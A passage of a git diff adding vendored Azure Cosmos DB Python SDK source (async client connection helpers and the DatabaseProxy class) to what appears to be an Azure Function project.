+ PartitionResolverErrorMessage = ( + "Couldn't find any partition resolvers for the database link provided. " + + "Ensure that the link you used when registering the partition resolvers " + + "matches the link provided or you need to register both types of database " + + "link(self link as well as ID based link)." + ) + + # Gets the collection id and path for the document + def _GetContainerIdWithPathForItem(self, database_or_container_link, document, options): + + if not database_or_container_link: + raise ValueError("database_or_container_link is None or empty.") + + if document is None: + raise ValueError("document is None.") + + CosmosClientConnection.__ValidateResource(document) + document = document.copy() + if not document.get("id") and not options.get("disableAutomaticIdGeneration"): + document["id"] = base.GenerateGuidId() + + collection_link = database_or_container_link + + if base.IsDatabaseLink(database_or_container_link): + partition_resolver = self.GetPartitionResolver(database_or_container_link) + + if partition_resolver is not None: + collection_link = partition_resolver.ResolveForCreate(document) + else: + raise ValueError(CosmosClientConnection.PartitionResolverErrorMessage) + + path = base.GetPathFromLink(collection_link, "docs") + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return collection_id, document, path + + def _GetUserIdWithPathForPermission(self, permission, user_link): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return path, user_id + + def RegisterPartitionResolver(self, database_link, partition_resolver): + """Registers the partition resolver associated with the database link + + :param str database_link: + Database Self Link or ID based link. + :param object partition_resolver: + An instance of PartitionResolver. + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + if partition_resolver is None: + raise ValueError("partition_resolver is None.") + + self.partition_resolvers = {base.TrimBeginningAndEndingSlashes(database_link): partition_resolver} + + def GetPartitionResolver(self, database_link): + """Gets the partition resolver associated with the database link + + :param str database_link: + Database self link or ID based link. + + :return: + An instance of PartitionResolver. + :rtype: object + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + return self.partition_resolvers.get(base.TrimBeginningAndEndingSlashes(database_link)) + + # Adds the partition key to options + async def _AddPartitionKey(self, collection_link, document, options): + collection_link = base.TrimBeginningAndEndingSlashes(collection_link) + + # TODO: Refresh the cache if partition is extracted automatically and we get a 400.1001 + + # If the document collection link is present in the cache, then use the cached partitionkey definition + if collection_link in self.partition_key_definition_cache: + partitionKeyDefinition = self.partition_key_definition_cache.get(collection_link) + # Else read the collection from backend and add it to the cache + else: + collection = await self.ReadContainer(collection_link) + partitionKeyDefinition = collection.get("partitionKey") + self.partition_key_definition_cache[collection_link] = partitionKeyDefinition + + # If the collection doesn't have a partition key definition, skip it as it's a legacy collection + if partitionKeyDefinition: + # If the user has passed in the partitionKey in options use that elase extract it from the document + if "partitionKey" not in options: + partitionKeyValue = self._ExtractPartitionKey(partitionKeyDefinition, document) + options["partitionKey"] = partitionKeyValue + + return options + + # Extracts the partition key from the document using the partitionKey definition + def _ExtractPartitionKey(self, partitionKeyDefinition, document): + + # Parses the paths into a list of token each representing a property + partition_key_parts = base.ParsePaths(partitionKeyDefinition.get("paths")) + # Check if the partitionKey is system generated or not + is_system_key = partitionKeyDefinition["systemKey"] if "systemKey" in partitionKeyDefinition else False + + # Navigates the document to retrieve the partitionKey specified in the paths + return self._retrieve_partition_key(partition_key_parts, document, is_system_key) + + # Navigates the document to retrieve the partitionKey specified in the partition key parts + def _retrieve_partition_key(self, partition_key_parts, document, is_system_key): + expected_matchCount = len(partition_key_parts) + matchCount = 0 + partitionKey = document + + for part in partition_key_parts: + # At any point if we don't find the value of a sub-property in the document, we return as Undefined + if part not in partitionKey: + return self._return_undefined_or_empty_partition_key(is_system_key) + + partitionKey = partitionKey.get(part) + matchCount += 1 + # Once we reach the "leaf" value(not a dict), we break from loop + if not isinstance(partitionKey, dict): + break + + # Match the count of hops we did to get the partitionKey with the length of + # partition key parts and validate that it's not a dict at that level + if (matchCount != expected_matchCount) or isinstance(partitionKey, dict): + return self._return_undefined_or_empty_partition_key(is_system_key) + + return partitionKey + + def refresh_routing_map_provider(self): + # re-initializes the routing map provider, effectively refreshing the current partition key range cache + self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self) + + async def _GetQueryPlanThroughGateway(self, query, resource_link, **kwargs): + supported_query_features = (documents._QueryFeature.Aggregate + "," + + documents._QueryFeature.CompositeAggregate + "," + + documents._QueryFeature.Distinct + "," + + documents._QueryFeature.MultipleOrderBy + "," + + documents._QueryFeature.OffsetAndLimit + "," + + documents._QueryFeature.OrderBy + "," + + documents._QueryFeature.Top) + + options = { + "contentType": runtime_constants.MediaTypes.Json, + "isQueryPlanRequest": True, + "supportedQueryFeatures": supported_query_features, + "queryVersion": http_constants.Versions.QueryVersion + } + + resource_link = base.TrimBeginningAndEndingSlashes(resource_link) + path = base.GetPathFromLink(resource_link, "docs") + resource_id = base.GetResourceIdOrFullNameFromLink(resource_link) + + return await self.__QueryFeed(path, + "docs", + resource_id, + lambda r: r, + None, + query, + options, + is_query_plan=True, + **kwargs) + + @staticmethod + def _return_undefined_or_empty_partition_key(is_system_key): + if is_system_key: + return _Empty + return _Undefined + + @staticmethod + def __ValidateResource(resource): + id_ = resource.get("id") + if id_: + try: + if id_.find("/") != -1 or id_.find("\\") != -1 or id_.find("?") != -1 or id_.find("#") != -1: + raise ValueError("Id contains illegal chars.") + + if id_[-1] == " ": + raise ValueError("Id ends with a space.") + except AttributeError: + raise_with_traceback(TypeError, message="Id type must be a string.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py new file mode 100644 index 0000000..1289c40 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_database.py @@ -0,0 +1,785 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Interact with databases in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Union, cast + +import warnings +from azure.core.async_paging import AsyncItemPaged +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.tracing.decorator import distributed_trace + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options +from ._container import ContainerProxy +from ..offer import ThroughputProperties +from ..http_constants import StatusCodes +from ..exceptions import CosmosResourceNotFoundError +from ._user import UserProxy +from ..documents import IndexingMode +from ..partition_key import PartitionKey + +__all__ = ("DatabaseProxy",) + + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +class DatabaseProxy(object): + """An interface to interact with a specific database. + + This class should not be instantiated directly. Instead use the + :func:`~azure.cosmos.aio.cosmos_client.CosmosClient.get_database_client` method to get an existing + database, or the :func:`~azure.cosmos.aio.cosmos_client.CosmosClient.create_database` method to create + a new database. + + A database contains one or more containers, each of which can contain items, + stored procedures, triggers, and user-defined functions. + + A database can also have associated users, each of which is configured with + a set of permissions for accessing certain containers, stored procedures, + triggers, user-defined functions, or items. + + :ivar id: The ID (name) of the database. + + An Azure Cosmos DB SQL API database has the following system-generated + properties. These properties are read-only: + + * `_rid`: The resource ID. + * `_ts`: When the resource was last updated. The value is a timestamp. + * `_self`: The unique addressable URI for the resource. + * `_etag`: The resource etag required for optimistic concurrency control. + * `_colls`: The addressable path of the collections resource. + * `_users`: The addressable path of the users resource. + """ + + def __init__( + self, + client_connection: CosmosClientConnection, + id: str, # pylint: disable=redefined-builtin + properties: Dict[str, Any] = None + ) -> None: + """ + :param client_connection: Client from which this database was retrieved. + :type client_connection: ~azure.cosmos.aio.CosmosClientConnection + :param str id: ID (name) of the database. + """ + self.client_connection = client_connection + self.id = id + self.database_link = u"dbs/{}".format(self.id) + self._properties = properties + + def __repr__(self) -> str: + return "".format(self.database_link)[:1024] + + @staticmethod + def _get_container_id(container_or_id: Union[str, ContainerProxy, Dict[str, Any]]) -> str: + if isinstance(container_or_id, str): + return container_or_id + try: + return cast("ContainerProxy", container_or_id).id + except AttributeError: + pass + return cast("Dict[str, str]", container_or_id)["id"] + + def _get_container_link(self, container_or_id: Union[str, ContainerProxy, Dict[str, Any]]) -> str: + return u"{}/colls/{}".format(self.database_link, self._get_container_id(container_or_id)) + + def _get_user_link(self, user_or_id: Union[UserProxy, str, Dict[str, Any]]) -> str: + if isinstance(user_or_id, str): + return u"{}/users/{}".format(self.database_link, user_or_id) + try: + return cast("UserProxy", user_or_id).user_link + except AttributeError: + pass + return u"{}/users/{}".format(self.database_link, cast("Dict[str, str]", user_or_id)["id"]) + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @distributed_trace_async + async def read(self, **kwargs: Any) -> Dict[str, Any]: + """Read the database properties. + + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given database couldn't be retrieved. + :returns: A dict representing the database properties + :rtype: Dict[str, Any] + """ + # TODO this helper function should be extracted from CosmosClient + from ._cosmos_client import CosmosClient + + database_link = CosmosClient._get_database_link(self) + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + self._properties = await self.client_connection.ReadDatabase( + database_link, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, self._properties) + + return cast('Dict[str, Any]', self._properties) + + @distributed_trace_async + async def create_container( + self, + id: str, # pylint: disable=redefined-builtin + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Create a new container with the given ID (name). + + If a container with the given ID already exists, a CosmosResourceExistsError is raised. + + :param str id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword dict[str, str] unique_key_policy: The unique key policy to apply to the container. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :keyword int analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. + :returns: A `ContainerProxy` instance representing the new container. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_container] + :end-before: [END create_container] + :language: python + :dedent: 0 + :caption: Create a container with default settings: + :name: create_container + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_container_with_settings] + :end-before: [END create_container_with_settings] + :language: python + :dedent: 0 + :caption: Create a container with specific settings; in this case, a custom partition key: + :name: create_container_with_settings + """ + definition: Dict[str, Any] = dict(id=id) + if partition_key is not None: + definition["partitionKey"] = partition_key + indexing_policy = kwargs.pop('indexing_policy', None) + if indexing_policy is not None: + if indexing_policy.get("indexingMode") is IndexingMode.Lazy: + warnings.warn( + "Lazy indexing mode has been deprecated. Mode will be set to consistent indexing by the backend.", + DeprecationWarning + ) + definition["indexingPolicy"] = indexing_policy + default_ttl = kwargs.pop('default_ttl', None) + if default_ttl is not None: + definition["defaultTtl"] = default_ttl + unique_key_policy = kwargs.pop('unique_key_policy', None) + if unique_key_policy is not None: + definition["uniqueKeyPolicy"] = unique_key_policy + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + if conflict_resolution_policy is not None: + definition["conflictResolutionPolicy"] = conflict_resolution_policy + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + if analytical_storage_ttl is not None: + definition["analyticalStorageTtl"] = analytical_storage_ttl + + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + offer_throughput = kwargs.pop('offer_throughput', None) + if offer_throughput is not None: + request_options["offerThroughput"] = offer_throughput + + data = await self.client_connection.CreateContainer( + database_link=self.database_link, collection=definition, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, data) + + return ContainerProxy(self.client_connection, self.database_link, data["id"], properties=data) + + @distributed_trace_async + async def create_container_if_not_exists( + self, + id: str, # pylint: disable=redefined-builtin + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Create a container if it does not exist already. + + If the container already exists, the existing settings are returned. + Note: it does not check or update the existing container settings or offer throughput + if they differ from what was passed into the method. + + :param str id: ID (name) of container to create. + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword int offer_throughput: The provisioned throughput for this offer. + :keyword dict[str, str] unique_key_policy: The unique key policy to apply to the container. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :keyword int analytical_storage_ttl: Analytical store time to live (TTL) for items in the container. A value of + None leaves analytical storage off and a value of -1 turns analytical storage on with no TTL. Please + note that analytical storage can only be enabled on Synapse Link enabled accounts. + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The container creation failed. + :returns: A `ContainerProxy` instance representing the new container. + :rtype: ~azure.cosmos.aio.ContainerProxy + """ + + try: + container_proxy = self.get_container_client(id) + await container_proxy.read(**kwargs) + return container_proxy + except CosmosResourceNotFoundError: + indexing_policy = kwargs.pop('indexing_policy', None) + default_ttl = kwargs.pop('default_ttl', None) + unique_key_policy = kwargs.pop('unique_key_policy', None) + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + analytical_storage_ttl = kwargs.pop("analytical_storage_ttl", None) + offer_throughput = kwargs.pop('offer_throughput', None) + response_hook = kwargs.pop('response_hook', None) + return await self.create_container( + id=id, + partition_key=partition_key, + indexing_policy=indexing_policy, + default_ttl=default_ttl, + offer_throughput=offer_throughput, + unique_key_policy=unique_key_policy, + conflict_resolution_policy=conflict_resolution_policy, + analytical_storage_ttl=analytical_storage_ttl, + response_hook=response_hook + ) + + def get_container_client(self, container: Union[str, ContainerProxy, Dict[str, Any]]) -> ContainerProxy: + """Get a `ContainerProxy` for a container with specified ID (name). + + :param container: The ID (name), dict representing the properties, or :class:`ContainerProxy` + instance of the container to get. + :type container: Union[str, Dict[str, Any], ~azure.cosmos.aio.ContainerProxy] + :returns: A `ContainerProxy` instance representing the container. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START get_container] + :end-before: [END get_container] + :language: python + :dedent: 0 + :caption: Get an existing container, handling a failure if encountered: + :name: get_container + """ + + try: + id_value = container.id + except AttributeError: + try: + id_value = container['id'] + except TypeError: + id_value = container + + return ContainerProxy(self.client_connection, self.database_link, id_value) + + @distributed_trace + def list_containers( + self, + **kwargs + ) -> AsyncItemPaged[Dict[str, Any]]: + """List the containers in the database. + + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of container properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START list_containers] + :end-before: [END list_containers] + :language: python + :dedent: 0 + :caption: List all containers in the database: + :name: list_containers + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadContainers( + database_link=self.database_link, options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_containers( + self, + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """List the properties for containers in the current database. + + :keyword Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + :paramtype parameters: Optional[List[Dict[str, Any]]] + :keyword int max_item_count: Max number of items to be returned in the enumeration operation. + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of container properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + query = kwargs.pop('query', None) + result = self.client_connection.QueryContainers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def replace_container( + self, + container: Union[str, ContainerProxy, Dict[str, Any]], + partition_key: PartitionKey, + **kwargs: Any + ) -> ContainerProxy: + """Reset the properties of the container. + + Property changes are persisted immediately. Any properties not specified + will be reset to their default values. + + :param container: The ID (name), dict representing the properties or + :class:`ContainerProxy` instance of the container to be replaced. + :type container: Union[str, Dict[str, Any], ~azure.cosmos.aio.ContainerProxy] + :param partition_key: The partition key to use for the container. + :type partition_key: ~azure.cosmos.partition_key.PartitionKey + :keyword dict[str, str] indexing_policy: The indexing policy to apply to the container. + :keyword int default_ttl: Default time to live (TTL) for items in the container. + If unspecified, items do not expire. + :keyword dict[str, str] conflict_resolution_policy: The conflict resolution policy to apply to the container. + :keyword str session_token: Token for use with Session consistency. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: Raised if the container couldn't be replaced. + This includes if the container with given id does not exist. + :returns: A `ContainerProxy` instance representing the container after replace completed. + :rtype: ~azure.cosmos.aio.ContainerProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START reset_container_properties] + :end-before: [END reset_container_properties] + :language: python + :dedent: 0 + :caption: Reset the TTL property on a container, and display the updated properties: + :name: reset_container_properties + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + container_id = self._get_container_id(container) + container_link = self._get_container_link(container_id) + indexing_policy = kwargs.pop('indexing_policy', None) + default_ttl = kwargs.pop('default_ttl', None) + conflict_resolution_policy = kwargs.pop('conflict_resolution_policy', None) + parameters = { + key: value + for key, value in { + "id": container_id, + "partitionKey": partition_key, + "indexingPolicy": indexing_policy, + "defaultTtl": default_ttl, + "conflictResolutionPolicy": conflict_resolution_policy, + }.items() + if value is not None + } + + container_properties = await self.client_connection.ReplaceContainer( + container_link, collection=parameters, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, container_properties) + + return ContainerProxy( + self.client_connection, self.database_link, container_properties["id"], properties=container_properties + ) + + @distributed_trace_async + async def delete_container( + self, + container: Union[str, ContainerProxy, Dict[str, Any]], + **kwargs: Any + ) -> None: + """Delete a container. + + :param container: The ID (name) of the container to delete. You can either + pass in the ID of the container to delete, a :class:`ContainerProxy` instance or + a dict representing the properties of the container. + :type container: str or Dict[str, Any] or ~azure.cosmos.aio.ContainerProxy + :keyword str session_token: Token for use with Session consistency. + :keyword dict[str, str] initial_headers: Initial headers to be sent as part of the request. + :keyword str etag: An ETag value, or the wildcard character (*). Used to check if the resource + has changed, and act according to the condition specified by the `match_condition` parameter. + :keyword match_condition: The match condition to use upon the etag. + :paramtype match_condition: ~azure.core.MatchConditions + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the container couldn't be deleted. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + collection_link = self._get_container_link(container) + result = await self.client_connection.DeleteContainer(collection_link, options=request_options, **kwargs) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace_async + async def create_user(self, body: Dict[str, Any], **kwargs: Any) -> UserProxy: # body should just be id? + """Create a new user in the container. + + To update or replace an existing user, use the + :func:`ContainerProxy.upsert_user` method. + + :param Dict[str, Any] body: A dict-like object with an `id` key and value representing the user to be created. + The user ID must be unique within the database, and consist of no more than 255 characters. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user couldn't be created. + :returns: A `UserProxy` instance representing the new user. + :rtype: ~azure.cosmos.aio.UserProxy + + .. admonition:: Example: + + .. literalinclude:: ../samples/examples_async.py + :start-after: [START create_user] + :end-before: [END create_user] + :language: python + :dedent: 0 + :caption: Create a database user: + :name: create_user + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + user = await self.client_connection.CreateUser( + database_link=self.database_link, user=body, options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, user) + + return UserProxy( + client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user + ) + + def get_user_client(self, user: Union[str, UserProxy, Dict[str, Any]]) -> UserProxy: + """Get a `UserProxy` for a user with specified ID. + + :param user: The ID (name), dict representing the properties, or :class:`UserProxy` + instance of the user to get. + :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy] + :returns: A `UserProxy` instance representing the retrieved user. + :rtype: ~azure.cosmos.aio.UserProxy + """ + try: + id_value = user.id + except AttributeError: + try: + id_value = user['id'] + except TypeError: + id_value = user + + return UserProxy(client_connection=self.client_connection, id=id_value, database_link=self.database_link) + + @distributed_trace + def list_users(self, **kwargs: Any) -> AsyncItemPaged[Dict[str, Any]]: + """List all the users in the container. + + :keyword int max_item_count: Max number of users to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of user properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + result = self.client_connection.ReadUsers( + database_link=self.database_link, options=feed_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace + def query_users( + self, + query: Union[str, Dict[str, Any]], + **kwargs: Any + ) -> AsyncItemPaged[Dict[str, Any]]: + """Return all users matching the given `query`. + + :param Union[str, Dict[str, Any]] query: The Azure Cosmos DB SQL query to execute. + :keyword parameters: Optional array of parameters to the query. + Each parameter is a dict() with 'name' and 'value' keys. + Ignored if no query is provided. + :paramtype parameters: Optional[List[Dict[str, Any]]] + :keyword int max_item_count: Max number of users to be returned in the enumeration operation. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], AsyncItemPaged[Dict[str, Any]]], None] + :returns: An AsyncItemPaged of user properties (dicts). + :rtype: AsyncItemPaged[Dict[str, Any]] + """ + feed_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + max_item_count = kwargs.pop('max_item_count', None) + if max_item_count is not None: + feed_options["maxItemCount"] = max_item_count + + parameters = kwargs.pop('parameters', None) + result = self.client_connection.QueryUsers( + database_link=self.database_link, + query=query if parameters is None else dict(query=query, parameters=parameters), + options=feed_options, + **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + return result + + @distributed_trace_async + async def upsert_user(self, body: Dict[str, Any], **kwargs: Any) -> UserProxy: + """Insert or update the specified user. + + If the user already exists in the container, it is replaced. If the user + does not already exist, it is inserted. + + :param Dict[str, Any] body: A dict-like object representing the user to update or insert. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: If the given user could not be upserted. + :returns: A `UserProxy` instance representing the upserted user. + :rtype: ~azure.cosmos.aio.UserProxy + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + user = await self.client_connection.UpsertUser( + database_link=self.database_link, user=body, options=request_options, **kwargs + ) + + if response_hook: + response_hook(self.client_connection.last_response_headers, user) + + return UserProxy( + client_connection=self.client_connection, id=user["id"], database_link=self.database_link, properties=user + ) + + @distributed_trace_async + async def replace_user( + self, + user: Union[str, UserProxy, Dict[str, Any]], + body: Dict[str, Any], + **kwargs: Any + ) -> UserProxy: + """Replaces the specified user if it exists in the container. + + :param user: The ID (name), dict representing the properties or :class:`UserProxy` + instance of the user to be replaced. + :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy] + :param Dict[str, Any] body: A dict-like object representing the user to replace. + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], Dict[str, Any]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: + If the replace failed or the user with given ID does not exist. + :returns: A `UserProxy` instance representing the user after replace went through. + :rtype: ~azure.cosmos.aio.UserProxy + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + replaced_user: Dict[str, Any] = await self.client_connection.ReplaceUser( + user_link=self._get_user_link(user), user=body, options=request_options, **kwargs) + + if response_hook: + response_hook(self.client_connection.last_response_headers, replaced_user) + + return UserProxy( + client_connection=self.client_connection, + id=replaced_user["id"], + database_link=self.database_link, + properties=replaced_user + ) + + @distributed_trace_async + async def delete_user(self, user: Union[str, UserProxy, Dict[str, Any]], **kwargs: Any) -> None: + """Delete the specified user from the container. + + :param user: The ID (name), dict representing the properties or :class:`UserProxy` + instance of the user to be deleted. + :type user: Union[str, Dict[str, Any], ~azure.cosmos.aio.UserProxy] + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], None], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: The user wasn't deleted successfully. + :raises ~azure.cosmos.exceptions.CosmosResourceNotFoundError: The user does not exist in the container. + :rtype: None + """ + request_options = _build_options(kwargs) + response_hook = kwargs.pop('response_hook', None) + + result = await self.client_connection.DeleteUser( + user_link=self._get_user_link(user), options=request_options, **kwargs + ) + if response_hook: + response_hook(self.client_connection.last_response_headers, result) + + @distributed_trace_async + async def get_throughput(self, **kwargs: Any) -> ThroughputProperties: + """Get the ThroughputProperties object for this database. + + If no ThroughputProperties already exists for the database, an exception is raised. + + :keyword response_hook: A callable invoked with the response metadata. + :paramtype response_hook: Callable[[Dict[str, str], List[Dict[str, Any]]], None] + :raises ~azure.cosmos.exceptions.CosmosHttpResponseError: No throughput properties exist for the database + or the throughput properties could not be retrieved. + :returns: ThroughputProperties for the database. + :rtype: ~azure.cosmos.offer.ThroughputProperties + """ + response_hook = kwargs.pop('response_hook', None) + properties = await self._get_properties() + link = properties["_self"] + query_spec = { + "query": "SELECT * FROM root r WHERE r.resource=@link", + "parameters": [{"name": "@link", "value": link}], + } + throughput_properties = [throughput async for throughput in + self.client_connection.QueryOffers(query_spec, **kwargs)] + if len(throughput_properties) == 0: + raise CosmosResourceNotFoundError( + status_code=StatusCodes.NOT_FOUND, + message="Could not find 